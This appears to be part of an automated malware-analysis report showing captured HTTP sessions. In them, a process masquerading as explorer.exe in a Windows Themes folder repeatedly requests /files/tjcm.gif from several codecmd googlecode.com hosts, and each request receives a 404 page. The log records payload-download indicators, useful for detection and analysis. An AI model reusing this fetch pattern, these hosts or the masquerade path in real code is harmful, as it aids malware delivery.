                                                                                                                                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:37.991600037 CET494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      20192.168.2.649917173.194.221.82803224C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:39.340348959 CET215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                      Host: codecmd03.googlecode.com
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:40.731707096 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Referrer-Policy: no-referrer
                                                                                                                                                                                                                                      Content-Length: 1575
                                                                                                                                                                                                                                      Date: Mon, 16 Dec 2024 07:28:40 GMT
                                                                                                                                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:40.731750965 CET494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      21192.168.2.649927173.194.221.82803224C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:41.794857025 CET215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                      Host: codecmd01.googlecode.com
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:43.193332911 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Referrer-Policy: no-referrer
                                                                                                                                                                                                                                      Content-Length: 1575
                                                                                                                                                                                                                                      Date: Mon, 16 Dec 2024 07:28:42 GMT
                                                                                                                                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:43.193361044 CET494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      22192.168.2.649933173.194.221.82803224C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:44.200712919 CET215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                      Host: codecmd02.googlecode.com
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:45.684885979 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Referrer-Policy: no-referrer
                                                                                                                                                                                                                                      Content-Length: 1575
                                                                                                                                                                                                                                      Date: Mon, 16 Dec 2024 07:28:45 GMT
                                                                                                                                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:45.684901953 CET494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      23192.168.2.649939173.194.221.82803224C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:46.701138973 CET215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                      Host: codecmd03.googlecode.com
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:48.100435972 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Referrer-Policy: no-referrer
                                                                                                                                                                                                                                      Content-Length: 1575
                                                                                                                                                                                                                                      Date: Mon, 16 Dec 2024 07:28:47 GMT
                                                                                                                                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:48.100450993 CET494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      24192.168.2.649945173.194.221.82803224C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:49.180699110 CET215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                      Host: codecmd01.googlecode.com
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:50.548254013 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Referrer-Policy: no-referrer
                                                                                                                                                                                                                                      Content-Length: 1575
                                                                                                                                                                                                                                      Date: Mon, 16 Dec 2024 07:28:50 GMT
                                                                                                                                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:50.548278093 CET494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      25192.168.2.649951173.194.221.82803224C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:51.438167095 CET215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                      Host: codecmd02.googlecode.com
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Dec 16, 2024 08:28:52.839637995 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Referrer-Policy: no-referrer
                                                                                                                                                                                                                                      Content-Length: 1575
                                                                                                                                                                                                                                      Date: Mon, 16 Dec 2024 07:28:52 GMT
                                                                                                                                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
